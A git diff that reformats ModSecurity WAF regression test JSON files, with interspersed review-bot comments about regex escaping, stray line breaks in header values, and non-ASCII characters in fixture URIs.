@@ -152,7 +163,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -164,8 +175,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -175,22 +186,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?a=test&b=test&c=test&d=test", + "uri": "/test.pl?a=test&b=test&c=test&d=test", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ + "" ] }, "expected": { - "http_code": 200, - "debug_log": "Target value: \"4\" \\(Variable: TX:test\\)" + "debug_log": "Target value: \"4\" \\(Variable: TX:test\\)", + "http_code": 200 }, "rules": [ "SecRuleEngine On", diff --git a/test/test-cases/regression/issue-1528.json b/test/test-cases/regression/issue-1528.json index f2257055c2..2a8255d565 100644 --- a/test/test-cases/regression/issue-1528.json +++ b/test/test-cases/regression/issue-1528.json 
@@ -1,38 +1,46 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Macro expansion inside regex does not work", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1528", - "gihub_issue": 1528, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?param=attack", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Matched \"Operator `Rx' with parameter `\\^attack\\$'" - }, - "rules": [ - "SecRuleEngine On", - "SecAction \"id:1, nolog, setvar:tx.bad_value=attack\"", - "SecRule ARGS:param \"@rx ^%{tx.bad_value}$\" \"id:2,block\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Macro expansion inside regex does not work", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1528", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + + }, + "uri": "/?param=attack", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Matched \"Operator `Rx' with parameter `\\^attack\\$'", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1, nolog, setvar:tx.bad_value=attack\"", + "SecRule ARGS:param \"@rx ^%{tx.bad_value}$\" \"id:2,block\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1565.json b/test/test-cases/regression/issue-1565.json index 6596404f17..da66ac574c 100644 --- a/test/test-cases/regression/issue-1565.json +++ b/test/test-cases/regression/issue-1565.json 
@@ -1,79 +1,92 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1565", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1565", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 0." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:Content-Length \"!^\\d+$\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1565", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539" + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] 
+ }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:Content-Length \"!^\\d+$\" \"id:1,log\"" + ] }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:Content-Length \"^\\d+$\" \"id:1,log\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1565", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:Content-Length \"^\\d+$\" \"id:1,log\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1576.json b/test/test-cases/regression/issue-1576.json index eb41e1dfb6..68d193c9bf 100644 --- a/test/test-cases/regression/issue-1576.json +++ b/test/test-cases/regression/issue-1576.json 
@@ -4,21 +4,25 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (1)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "{", " \"foo\":\"bar\",", @@ -33,18 +37,23 @@ "}" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "zwei\" \\(Variable: ARGS:json.ops.array_3.eins.array_0" + "expected": { + "debug_log": "zwei\" \\(Variable: ARGS:json.ops.array_3.eins.array_0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] }, { 
@@ -52,21 +61,25 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "[", " \"one\",", @@ -75,18 +88,23 @@ "]" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "three\" \\(Variable: ARGS:json.array_2\\)" + "expected": { + "debug_log": "three\" \\(Variable: ARGS:json.array_2\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] }, { 
@@ -94,21 +112,25 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "{", " \"foo\":\"bar\",", @@ -126,18 +148,23 @@ "}" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "treze\" \\(Variable: ARGS:json.ops.seis.doze\\)" + "expected": { + "debug_log": "treze\" \\(Variable: ARGS:json.ops.seis.doze\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] } ] diff --git a/test/test-cases/regression/issue-1591.json b/test/test-cases/regression/issue-1591.json index 2b32aa29a2..4de1ad2629 100644 --- a/test/test-cases/regression/issue-1591.json +++ b/test/test-cases/regression/issue-1591.json 
@@ -1,119 +1,140 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (1/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (1/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 0." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/ \"321\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (2/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1." 
- }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_COOKIES \"321\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (3/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/ \"321\" \"id:1,log\"" + ] }, - "expected": { - "debug_log": "Variable: REQUEST_HEADERS:Content-Length" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (2/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + 
"uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_COOKIES \"321\" \"id:1,log\"" + ] }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' \"321\" \"id:1,log\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (3/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Variable: REQUEST_HEADERS:Content-Length", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' \"321\" \"id:1,log\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1725.json b/test/test-cases/regression/issue-1725.json index afd7c794e2..16dcf023b8 100644 --- a/test/test-cases/regression/issue-1725.json +++ b/test/test-cases/regression/issue-1725.json 
@@ -1,42 +1,48 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Macro expansion on msg and logdata does not work for DURATION", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1725", - "gihub_issue": 1725, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Macro expansion on msg and logdata does not work for DURATION", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1725", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1, - "uri": "/test" - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "\/test; 0.[0-9]+; 0.[0-9]+;" - }, - "rules": [ - "SecRuleEngine On", - "SecRule DURATION \"@unconditionalMatch\" \"phase:2,id:10001,log,auditlog,pass,msg:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};',logdata:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};'\"" - ] -} + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "1539", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "/test", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "/test; 0.[0-9]+; 0.[0-9]+;", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule DURATION \"@unconditionalMatch\" \"phase:2,id:10001,log,auditlog,pass,msg:'%{REQUEST_URI}; %{MATCHED_VAR}; %{DURATION};',logdata:'%{REQUEST_URI}; %{MATCHED_VAR}; 
%{DURATION};'\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1743.json b/test/test-cases/regression/issue-1743.json index 5e2b2fad35..ed08f62cd5 100644 --- a/test/test-cases/regression/issue-1743.json +++ b/test/test-cases/regression/issue-1743.json 
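Review bot: The rewritten `debug_log` expectation in the issue-1725.json hunk, `"/test; 0.[0-9]+; 0.[0-9]+;"`, leaves both dots unescaped and hard-codes a leading `0`, so it accepts any character in the dot position and would stop matching if DURATION ever expanded to a value of 1 or more (a slow or instrumented run, for instance). Other expectations in this patch escape `(` and `?`, which suggests these strings are matched as regular expressions. I would write it as `"debug_log": "/test; [0-9]+\\.[0-9]+; [0-9]+\\.[0-9]+;"`, assuming the macro always expands to a decimal number. The rule text itself needs no change.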
@@ -1,74 +1,88 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regex match does not work when arg ends with unescaped equal char (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1743", - "gihub_issue": 1743, - "client": { - "ip": "200.249.12.31", - "port": 2313 + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regex match does not work when arg ends with unescaped equal char (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1743", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + + }, + "uri": "/?x=foo%3d", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Value: `foo='", + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" + ] }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?x=foo%3d", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Value: `foo='", - "http_code": 403 - }, - "rules": [ - "SecRuleEngine On", - "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regex match does not work when arg ends with unescaped equal char (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1743", - "gihub_issue": 1743, - "client": { - "ip": 
"200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?x=foo=", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Value: `foo='", - "http_code": 403 - }, - "rules": [ - "SecRuleEngine On", - "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regex match does not work when arg ends with unescaped equal char (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1743", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + + }, + "uri": "/?x=foo=", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Value: `foo='", + "http_code": 403 + }, + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"foo?=\" \"phase:2,id:1,capture,t:none,t:lowercase,deny,msg:'XSS Attack Detected',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1785.json b/test/test-cases/regression/issue-1785.json index ba252b144f..124f104dff 100644 --- a/test/test-cases/regression/issue-1785.json +++ b/test/test-cases/regression/issue-1785.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 
@@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,16 +27,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-1812.json b/test/test-cases/regression/issue-1812.json index 47c51933bd..417a11d40e 100644 --- a/test/test-cases/regression/issue-1812.json +++ b/test/test-cases/regression/issue-1812.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Converting £ (%C2%A3) from query string", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1812", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1812", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", 
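Review bot: In the `response.headers` block of the issue-1785.json hunk, the rewritten line `"Content-Type": "text/xml; charset=utf-8\n\r"` keeps a trailing LF CR inside the header value, and `Content-Length` stays `"length\n\r"`. The test title is about the pass action, so line breaks inside header values look like leftover fixture text rather than the input under test, and they make the case read like a header-splitting test, which it is not. If nothing relies on them, `"Content-Type": "text/xml; charset=utf-8"` and a numeric `Content-Length` would be clearer; the same values recur in the issue-1812.json and issue-1831.json hunks. The enclosing test object starts and ends outside this hunk.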
@@ -27,19 +27,25 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=£&bar=%C2%A3", + "uri": "/test.pl?foo=£&bar=%C2%A3", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { - "debug_log": "\/test.pl\\?foo=\\\\xc2\\\\xa3&bar=\\\\xc2\\\\xa3" + "debug_log": "/test.pl\\?foo=\\\\xc2\\\\xa3&bar=\\\\xc2\\\\xa3", + "http_code": 200 }, "rules": [ "SecRuleEngine On", diff --git a/test/test-cases/regression/issue-1825.json b/test/test-cases/regression/issue-1825.json index ca9d4ca435..126826c950 100644 --- a/test/test-cases/regression/issue-1825.json +++ b/test/test-cases/regression/issue-1825.json 
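Review bot: The rewritten `"uri": "/test.pl?foo=£&bar=%C2%A3"` keeps a literal non-ASCII character in the fixture while the expectation pins the escaped bytes c2 a3 for both parameters, so the first half of the assertion depends on this file being stored as UTF-8. Writing the character as a JSON escape, `"uri": "/test.pl?foo=\u00a3&bar=%C2%A3"`, should yield the same bytes after parsing and survives editors or tools that re-encode the file. The issue-1831.json hunks use the same URI.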
@@ -1,28 +1,28 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"multipart Content-Disposition should allow filename* field (1/7)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" +[ + { + "enabled": 1, + "version_min": 300000, + "title": "multipart Content-Disposition should allow filename* field (1/7)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; 